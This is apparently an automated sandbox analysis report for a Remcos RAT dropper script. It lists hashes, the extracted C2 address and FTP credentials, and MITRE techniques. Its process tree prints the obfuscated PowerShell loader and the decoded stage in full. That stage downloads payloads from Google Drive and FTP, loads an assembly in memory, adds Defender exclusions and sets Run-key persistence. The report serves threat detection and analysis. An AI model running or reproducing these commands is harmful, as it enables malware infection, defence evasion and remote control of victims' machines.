remcos | d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 05:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs
Size

681KB
MD5

8dbb7515d5a60561c6274dc9727f0153
SHA1

ff42190854208b6a0584542d7ab7319eac4860e2
SHA256

d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9
SHA512

acd73dfc1152bf6d9e0d85832c73765f09e6e23b085ba1a3fa12016a02e6c13fe0a8483a1ac8a1528f91d7d85b9b58a5834f11a8ec13020a589421c934bd2e12
SSDEEP

1536:9SSSSSSSSSSSSSSSSSSSSSSSx22222222222222222222222222222222222222m:r0iH2GgF+

Score

10^/10

remcos grace defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

remcos

Botnet

Grace

severdops.ddns.net:7717

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-P28XIL
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 7 IoCs

flow	pid	Process
8	4852	powershell.exe
17	4852	powershell.exe
19	4852	powershell.exe
21	4852	powershell.exe
23	4852	powershell.exe
25	4852	powershell.exe
27	4644	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
536	powershell.exe
4852	powershell.exe
228	powershell.exe
1452	powershell.exe
3168	powershell.exe
4644	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_xti = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\qizeb.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	pastebin.com
27	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4644 set thread context of 2484	4644	powershell.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
536	powershell.exe
536	powershell.exe
4852	powershell.exe
4852	powershell.exe
4852	powershell.exe
228	powershell.exe
1452	powershell.exe
228	powershell.exe
1452	powershell.exe
3168	powershell.exe
3168	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	4852	powershell.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	228	powershell.exe
Token: SeDebugPrivilege	3168	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2484	RegAsm.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 3532 wrote to memory of 536	3532	WScript.exe	82
PID 3532 wrote to memory of 536	3532	WScript.exe	82
PID 536 wrote to memory of 4852	536	powershell.exe	84
PID 536 wrote to memory of 4852	536	powershell.exe	84
PID 4852 wrote to memory of 228	4852	powershell.exe	89
PID 4852 wrote to memory of 228	4852	powershell.exe	89
PID 4852 wrote to memory of 1452	4852	powershell.exe	90
PID 4852 wrote to memory of 1452	4852	powershell.exe	90
PID 4852 wrote to memory of 3768	4852	powershell.exe	91
PID 4852 wrote to memory of 3768	4852	powershell.exe	91
PID 4852 wrote to memory of 3168	4852	powershell.exe	92
PID 4852 wrote to memory of 3168	4852	powershell.exe	92
PID 4852 wrote to memory of 4644	4852	powershell.exe	94
PID 4852 wrote to memory of 4644	4852	powershell.exe	94
PID 4852 wrote to memory of 2176	4852	powershell.exe	95
PID 4852 wrote to memory of 2176	4852	powershell.exe	95
PID 4644 wrote to memory of 3156	4644	powershell.exe	97
PID 4644 wrote to memory of 3156	4644	powershell.exe	97
PID 4644 wrote to memory of 3156	4644	powershell.exe	97
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98
PID 4644 wrote to memory of 2484	4644	powershell.exe	98

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9Ќз革DsЌз革KQЌз革gЌз革CkЌз革IЌз革Ќз革nЌз革GUЌз革dQByЌз革HQЌз革JwЌз革gЌз革CwЌз革IЌз革BlЌз革GoЌз革dwB6Ќз革GgЌз革JЌз革Ќз革gЌз革CwЌз革IЌз革Ќз革nЌз革GgЌз革dЌз革B0Ќз革HЌз革Ќз革cwЌз革6Ќз革C8Ќз革LwBlЌз革HYЌз革aQByЌз革HQЌз革dQBhЌз革GwЌз革cwBlЌз革HIЌз革dgBpЌз革GMЌз革ZQBzЌз革HIЌз革ZQB2Ќз革GkЌз革ZQB3Ќз革HMЌз革LgBjЌз革G8Ќз革bQЌз革vЌз革HMЌз革LgB0Ќз革HgЌз革dЌз革Ќз革nЌз革CЌз革Ќз革KЌз革Ќз革gЌз革F0Ќз革XQBbЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革FsЌз革IЌз革Ќз革sЌз革CЌз革Ќз革bЌз革BsЌз革HUЌз革bgЌз革kЌз革CЌз革Ќз革KЌз革BlЌз革GsЌз革bwB2Ќз革G4Ќз革SQЌз革uЌз革CkЌз革IЌз革Ќз革nЌз革EkЌз革VgBGЌз革HIЌз革cЌз革Ќз革nЌз革CЌз革Ќз革KЌз革BkЌз革G8Ќз革aЌз革B0Ќз革GUЌз革TQB0Ќз革GUЌз革RwЌз革uЌз革CkЌз革JwЌз革xЌз革HMЌз革cwBhЌз革GwЌз革QwЌз革uЌз革DMЌз革eQByЌз革GEЌз革cgBiЌз革GkЌз革TЌз革BzЌз革HMЌз革YQBsЌз革EMЌз革JwЌз革oЌз革GUЌз革cЌз革B5Ќз革FQЌз革dЌз革BlЌз革EcЌз革LgЌз革pЌз革CЌз革Ќз革RgBTЌз革HUЌз革dgB3Ќз革CQЌз革IЌз革Ќз革oЌз革GQЌз革YQBvЌз革EwЌз革LgBuЌз革GkЌз革YQBtЌз革G8Ќз革RЌз革B0Ќз革G4Ќз革ZQByЌз革HIЌз革dQBDЌз革DoЌз革OgBdЌз革G4Ќз革aQBhЌз革G0Ќз革bwBEЌз革HЌз革Ќз革cЌз革BBЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革7Ќз革CkЌз革IЌз革Ќз革pЌз革CЌз革Ќз革JwBBЌз革CcЌз革IЌз革Ќз革sЌз革CЌз革Ќз革JwCTIToЌз革kyEnЌз革CЌз革Ќз革KЌз革BlЌз革GMЌз革YQBsЌз革HЌз革Ќз革ZQBSЌз革C4Ќз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革NЌз革Ќз革2Ќз革GUЌз革cwBhЌз革EIЌз革bQBvЌз革HIЌз革RgЌз革6Ќз革DoЌз革XQB0Ќз革HIЌз革ZQB2Ќз革G4Ќз革bwBDЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BGЌз革FMЌз革dQB2Ќз革HcЌз革JЌз革Ќз革gЌз革F0Ќз革XQBbЌз革GUЌз革dЌз革B5Ќз革EIЌз革WwЌз革7Ќз革CcЌз革JQBJЌз革GgЌз革cQBSЌз革FgЌз革JQЌз革nЌз革CЌз革Ќз革PQЌз革gЌз革GUЌз革agB3Ќз革HoЌз革aЌз革Ќз革kЌз革DsЌз革KQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革IЌз革Ќз革oЌз革GcЌз革bgBpЌз革HIЌз革dЌз革BTЌз革GQЌз革YQBvЌз革GwЌз革bgB3Ќз革G8Ќз革RЌз革Ќз革uЌз革GIЌз革YgB4Ќз革GsЌз革JЌз革Ќз革gЌз革D0Ќз革IЌз革BnЌз革FMЌз革egBDЌз革EIЌз革bЌз革Ќз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgBiЌз革GIЌз革eЌз革BrЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革YgBiЌз革HgЌз革awЌз革kЌз革DsЌз革KQЌз革oЌз革GUЌз革cwBvЌз革HЌз革Ќз革cwBpЌз革GQЌз革LgBiЌз革GIЌз革eЌз革BrЌз革CQЌз革OwЌз革pЌз革CЌз革Ќз革JwB0Ќз革HgЌз革dЌз革Ќз革uЌз革DEЌз革MЌз革BMЌз革EwЌз革RЌз革Ќз革vЌз革DEЌз革MЌз革Ќз革vЌз革HIЌз革ZQB0Ќз革HЌз革Ќз革eQByЌз革GMЌз革cЌз革BVЌз革C8Ќз革cgBiЌз革C4Ќз革bQBvЌз革GMЌз革LgB0Ќз革GEЌз革cgBiЌз革HYЌз革awBjЌз革HMЌз革ZQBkЌз革C4Ќз革cЌз革B0Ќз革GYЌз革QЌз革Ќз革xЌз革HQЌз革YQByЌз革GIЌз革dgBrЌз革GMЌз革cwBlЌз革GQЌз革LwЌз革vЌз革DoЌз革cЌз革B0Ќз革GYЌз革JwЌз革gЌз革CgЌз革ZwBuЌз革GkЌз革cgB0Ќз革FMЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革YgBiЌз革HgЌз革awЌз革kЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革UwB6Ќз革EMЌз革QgBsЌз革CQЌз革OwЌз革pЌз革CcЌз革QЌз革BЌз革Ќз革HЌз革Ќз革SgЌз革4Ќз革DcЌз革NQЌз革xЌз革DIЌз革bwByЌз革HЌз革Ќз革cgBlЌз革HЌз革Ќз革bwBsЌз革GUЌз革dgBlЌз革GQЌз革JwЌз革sЌз革CkЌз革KQЌз革5Ќз革DQЌз革LЌз革Ќз革2Ќз革DEЌз革MQЌз革sЌз革DcЌз革OQЌз革sЌз革DQЌз革MQЌз革xЌз革CwЌз革OЌз革Ќз革5Ќз革CwЌз革OЌз革Ќз革xЌз革DEЌз革LЌз革Ќз革3Ќз革DЌз革Ќз革MQЌз革sЌз革DkЌз革OQЌз革sЌз革DUЌз革MQЌз革xЌз革CwЌз革MQЌз革wЌз革DEЌз革LЌз革Ќз革wЌз革DЌз革Ќз革MQЌз革oЌз革F0Ќз革XQBbЌз革HIЌз革YQBoЌз革GMЌз革WwЌз革gЌз革G4Ќз革aQBvЌз革GoЌз革LQЌз革oЌз革CgЌз革bЌз革BhЌз革GkЌз革dЌз革BuЌз革GUЌз革ZЌз革BlЌз革HIЌз革QwBrЌз革HIЌз革bwB3Ќз革HQЌз革ZQBOЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwЌз革gЌз革HQЌз革YwBlЌз革GoЌз革YgBvЌз革C0Ќз革dwBlЌз革G4Ќз革IЌз革Ќз革9Ќз革CЌз革Ќз革cwBsЌз革GEЌз革aQB0Ќз革G4Ќз革ZQBkЌз革GUЌз革cgBDЌз革C4Ќз革YgBiЌз革HgЌз革awЌз革kЌз革DsЌз革OЌз革BGЌз革FQЌз革VQЌз革6Ќз革DoЌз革XQBnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgB0Ќз革HgЌз革ZQBUЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwЌз革gЌз革D0Ќз革IЌз革BnЌз革G4Ќз革aQBkЌз革G8Ќз革YwBuЌз革EUЌз革LgBiЌз革GIЌз革eЌз革BrЌз革CQЌз革OwЌз革pЌз革HQЌз革bgBlЌз革GkЌз革bЌз革BDЌз革GIЌз革ZQBXЌз革C4Ќз革dЌз革BlЌз革E4Ќз革IЌз革B0Ќз革GMЌз革ZQBqЌз革GIЌз革TwЌз革tЌз革HcЌз革ZQBOЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革YgBiЌз革HgЌз革awЌз革kЌз革DsЌз革ZwBTЌз革HoЌз革QwBCЌз革GwЌз革JЌз革Ќз革7Ќз革DIЌз革MQBzЌз革GwЌз革VЌз革Ќз革6Ќз革DoЌз革XQBlЌз革HЌз革Ќз革eQBUЌз革GwЌз革bwBjЌз革G8Ќз革dЌз革BvЌз革HIЌз革UЌз革B5Ќз革HQЌз革aQByЌз革HUЌз革YwBlЌз革FMЌз革LgB0Ќз革GUЌз革TgЌз革uЌз革G0Ќз革ZQB0Ќз革HMЌз革eQBTЌз革FsЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革bЌз革BvЌз革GMЌз革bwB0Ќз革G8Ќз革cgBQЌз革HkЌз革dЌз革BpЌз革HIЌз革dQBjЌз革GUЌз革UwЌз革6Ќз革DoЌз革XQByЌз革GUЌз革ZwBhЌз革G4Ќз革YQBNЌз革HQЌз革bgBpЌз革G8Ќз革UЌз革BlЌз革GMЌз革aQB2Ќз革HIЌз革ZQBTЌз革C4Ќз革dЌз革BlЌз革E4Ќз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革DsЌз革fQBlЌз革HUЌз革cgB0Ќз革CQЌз革ewЌз革gЌз革D0Ќз革IЌз革BrЌз革GMЌз革YQBiЌз革GwЌз革bЌз革BhЌз革EMЌз革bgBvЌз革GkЌз革dЌз革BhЌз革GQЌз革aQBsЌз革GEЌз革VgBlЌз革HQЌз革YQBjЌз革GkЌз革ZgBpЌз革HQЌз革cgBlЌз革EMЌз革cgBlЌз革HYЌз革cgBlЌз革FMЌз革OgЌз革6Ќз革F0Ќз革cgBlЌз革GcЌз革YQBuЌз革GEЌз革TQB0Ќз革G4Ќз革aQBvЌз革FЌз革Ќз革ZQBjЌз革GkЌз革dgByЌз革GUЌз革UwЌз革uЌз革HQЌз革ZQBOЌз革C4Ќз革bQBlЌз革HQЌз革cwB5Ќз革FMЌз革WwB7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革CЌз革Ќз革ZgЌз革vЌз革CЌз革Ќз革MЌз革Ќз革gЌз革HQЌз革LwЌз革gЌз革HIЌз革LwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bgB3Ќз革G8Ќз革ZЌз革B0Ќз革HUЌз革aЌз革BzЌз革CЌз革Ќз革OwЌз革nЌз革DЌз革Ќз革OЌз革Ќз革xЌз革CЌз革Ќз革cЌз革BlЌз革GUЌз革bЌз革BzЌз革CcЌз革IЌз革BkЌз革G4Ќз革YQBtЌз革G0Ќз革bwBjЌз革C0Ќз革IЌз革BlЌз革HgЌз革ZQЌз革uЌз革GwЌз革bЌз革BlЌз革GgЌз革cwByЌз革GUЌз革dwBvЌз革HЌз革Ќз革OwЌз革gЌз革GUЌз革YwByЌз革G8Ќз革ZgЌз革tЌз革CЌз革Ќз革KQЌз革gЌз革CcЌз革cЌз革B1Ќз革HQЌз革cgBhЌз革HQЌз革UwBcЌз革HMЌз革bQBhЌз革HIЌз革ZwBvЌз革HIЌз革UЌз革BcЌз革HUЌз革bgBlЌз革E0Ќз革IЌз革B0Ќз革HIЌз革YQB0Ќз革FMЌз革XЌз革BzЌз革HcЌз革bwBkЌз革G4Ќз革aQBXЌз革FwЌз革dЌз革BmЌз革G8Ќз革cwBvЌз革HIЌз革YwBpЌз革E0Ќз革XЌз革BnЌз革G4Ќз革aQBtЌз革GEЌз革bwBSЌз革FwЌз革YQB0Ќз革GEЌз革RЌз革BwЌз革HЌз革Ќз革QQBcЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革IЌз革Ќз革oЌз革CЌз革Ќз革bgBvЌз革GkЌз革dЌз革BhЌз革G4Ќз革aQB0Ќз革HMЌз革ZQBEЌз革C0Ќз革IЌз革Ќз革nЌз革CUЌз革SQBoЌз革HEЌз革UgBYЌз革CUЌз革JwЌз革gЌз革G0Ќз革ZQB0Ќз革EkЌз革LQB5Ќз革HЌз革Ќз革bwBDЌз革CЌз革Ќз革OwЌз革gЌз革HQЌз革cgBhЌз革HQЌз革cwBlЌз革HIЌз革bwBuЌз革C8Ќз革IЌз革B0Ќз革GUЌз革aQB1Ќз革HEЌз革LwЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革YQBzЌз革HUЌз革dwЌз革gЌз革GUЌз革eЌз革BlЌз革C4Ќз革bЌз革BsЌз革GUЌз革aЌз革BzЌз革HIЌз革ZQB3Ќз革G8Ќз革cЌз革Ќз革gЌз革DsЌз革KQЌз革nЌз革HUЌз革cwBtЌз革C4Ќз革bgBpЌз革HcЌз革cЌз革BVЌз革FwЌз革JwЌз革gЌз革CsЌз革IЌз革BkЌз革EkЌз革UgBpЌз革E0Ќз革JЌз革Ќз革oЌз革CЌз革Ќз革PQЌз革gЌз革FEЌз革QQBqЌз革HoЌз革SQЌз革7Ќз革CkЌз革IЌз革BlЌз革G0Ќз革YQBOЌз革HIЌз革ZQBzЌз革FUЌз革OgЌз革6Ќз革F0Ќз革dЌз革BuЌз革GUЌз革bQBuЌз革G8Ќз革cgBpЌз革HYЌз革bgBFЌз革FsЌз革IЌз革Ќз革rЌз革CЌз革Ќз革JwBcЌз革HMЌз革cgBlЌз革HMЌз革VQBcЌз革DoЌз革QwЌз革nЌз革CgЌз革IЌз革Ќз革9Ќз革CЌз革Ќз革RgBHЌз革HIЌз革VQBBЌз革CQЌз革OwЌз革pЌз革CcЌз革dQBzЌз革G0Ќз革LgBuЌз革GkЌз革dwBwЌз革FUЌз革XЌз革Ќз革nЌз革CЌз革Ќз革KwЌз革gЌз革GQЌз革SQBSЌз革GkЌз革TQЌз革kЌз革CЌз革Ќз革LЌз革BCЌз革EsЌз革TЌз革BSЌз革FUЌз革JЌз革Ќз革oЌз革GUЌз革bЌз革BpЌз革EYЌз革ZЌз革BhЌз革G8Ќз革bЌз革BuЌз革HcЌз革bwBEЌз革C4Ќз革aQBNЌз革G8Ќз革YQBJЌз革CQЌз革OwЌз革4Ќз革EYЌз革VЌз革BVЌз革DoЌз革OgBdЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革HQЌз革eЌз革BlЌз革FQЌз革LgBtЌз革GUЌз革dЌз革BzЌз革HkЌз革UwBbЌз革CЌз革Ќз革PQЌз革gЌз革GcЌз革bgBpЌз革GQЌз革bwBjЌз革G4Ќз革RQЌз革uЌз革GkЌз革TQBvЌз革GEЌз革SQЌз革kЌз革DsЌз革KQB0Ќз革G4Ќз革ZQBpЌз革GwЌз革QwBiЌз革GUЌз革VwЌз革uЌз革HQЌз革ZQBOЌз革CЌз革Ќз革dЌз革BjЌз革GUЌз革agBiЌз革E8Ќз革LQB3Ќз革GUЌз革TgЌз革oЌз革CЌз革Ќз革PQЌз革gЌз革GkЌз革TQBvЌз革GEЌз革SQЌз革kЌз革DsЌз革fQЌз革7Ќз革CЌз革Ќз革KQЌз革nЌз革HQЌз革TwBMЌз革GMЌз革XwBLЌз革GEЌз革MwBaЌз革GYЌз革bwBYЌз革DIЌз革SgBKЌз革HIЌз革VgBoЌз革G0Ќз革VgЌз革5Ќз革GMЌз革bQЌз革5Ќз革FgЌз革cwB1Ќз革FgЌз革bQBqЌз革DEЌз革ZwЌз革xЌз革CcЌз革IЌз革Ќз革rЌз革CЌз革Ќз革RgBhЌз革EUЌз革WQBSЌз革CQЌз革KЌз革Ќз革gЌз革D0Ќз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JЌз革B7Ќз革CЌз革Ќз革ZQBzЌз革GwЌз革ZQB9Ќз革DsЌз革IЌз革Ќз革pЌз革CcЌз革MgЌз革0Ќз革HUЌз革WЌз革BKЌз革FQЌз革cQBhЌз革G0Ќз革ZwB5Ќз革E0Ќз革dЌз革BGЌз革HoЌз革YQBrЌз革FЌз革Ќз革UgЌз革xЌз革HEЌз革XwBJЌз革HYЌз革RwBpЌз革FgЌз革TgBkЌз革HEЌз革YQBOЌз革DEЌз革JwЌз革gЌз革CsЌз革IЌз革BGЌз革GEЌз革RQBZЌз革FIЌз革JAAoACAAPQAgAEYAYQBFAFkAUgAkAHsAIAApACAAVwBpAGkAQgBzACQAIAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABXAGkAaQBCAHMAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACAARgBhAEUAWQBSACQAOwApACAAJwB1AHMAbQAuAG4AaQB3AHAAVQBcACcAIAArACAAZABJAFIAaQBNACQAIAAoACAAbABlAGQAOwApACgAaAB0AGEAUABwAG0AZQBUAHQAZQBHADoAOgBdAGgAdABhAFAALgBPAEkALgBtAGUAdABzAHkAUwBbACAAPQAgAGQASQBSAGkATQAkAHsAIAApACAAYQBKAG4AVQBpACQAIAAoACAAZgBpADsAIAApADIAKABzAGwAYQB1AHEARQAuAHIAbwBqAGEATQAuAG4AbwBpAHMAcgBlAFYALgB0AHMAbwBoACQAIAA9ACAAYQBKAG4AVQBpACQAIAA7AA==';$txJSA = $qKKzc.replace('Ќз革' , 'A') ;$oXODH = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $txJSA ) ); $oXODH = $oXODH[-1..-$oXODH.Length] -join '';$oXODH = $oXODH.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs');powershell $oXODH
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $iUnJa = $host.Version.Major.Equals(2) ;if ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ( $MiRId + '\Upwin.msu' );$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = (New-Object Net.WebClient);$IaoMi.Encoding = [System.Text.Encoding]::UTF8;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu');$AUrGF = ('C:\Users\' + [Environment]::UserName );IzjAQ = ($MiRId + '\Upwin.msu'); powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$kxbb = (New-Object Net.WebClient);$kxbb.Encoding = [System.Text.Encoding]::UTF8;$kxbb.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $kxbb.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$kxbb.dispose();$kxbb = (New-Object Net.WebClient);$kxbb.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $kxbb.DownloadString( $lBCzSg );$hzwje = 'C:\Users\Admin\AppData\Local\Temp\d9ae1ca2c79c25731a8a5c2bbe4fda94d99a24cb58b653a5b46371c461c9b2a9.vbs';[Byte[]] $wvuSF = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $wvuSF ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.s/moc.sweiversecivreslautrive//:sptth' , $hzwje , 'true' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:228
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1452
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:3768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
